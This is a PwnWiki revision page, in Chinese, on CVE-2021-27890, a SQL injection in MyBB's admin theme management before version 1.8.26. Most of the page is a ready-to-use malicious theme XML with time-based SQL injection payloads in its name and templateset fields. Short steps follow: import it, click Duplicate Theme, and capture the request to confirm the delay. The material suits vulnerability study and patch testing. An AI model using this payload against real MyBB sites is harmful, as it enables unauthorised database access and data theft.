Difference between revisions of "CVE-2021-27890 MyBB後台論壇主題管理SQL注入漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> < 1.8.26 </pre> <translate> ==漏洞利用== </translate> <translate> 在後台主題管理處導入構造...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
| Line 10: | Line 10: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
在後台主題管理處導入構造的惡意xml | 在後台主題管理處導入構造的惡意xml | ||
</translate> | </translate> | ||
| Line 38: | Line 39: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
點擊Duplicate Theme,抓包,成功延时注入(導出主題也會存在該注入) | 點擊Duplicate Theme,抓包,成功延时注入(導出主題也會存在該注入) | ||
</translate> | </translate> | ||
Latest revision as of 10:37, 21 March 2021
影響版本
< 1.8.26
漏洞利用
在後台主題管理處導入構造的惡意xml
<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<editortheme><![CDATA[mybb.css]]></editortheme>
<imgdir><![CDATA[images]]></imgdir>
<logo><![CDATA[images/logo.png]]></logo>
<tablespace><![CDATA[5]]></tablespace>
<borderwidth><![CDATA[0]]></borderwidth>
<color><![CDATA[]]></color>
<disporder><![CDATA[a:7:{s:10:"global.css";i:1;s:10:"usercp.css";i:2;s:9:"modcp.css";i:3;s:16:"star_ratings.css";i:4;s:14:"showthread.css";i:5;s:17:"thread_status.css";i:6;s:8:"css3.css";i:7;}]]></disporder>
</properties>
<stylesheets>
</stylesheets>
<templates>
</templates>
</theme>
點擊Duplicate Theme,抓包,成功延时注入(導出主題也會存在該注入)
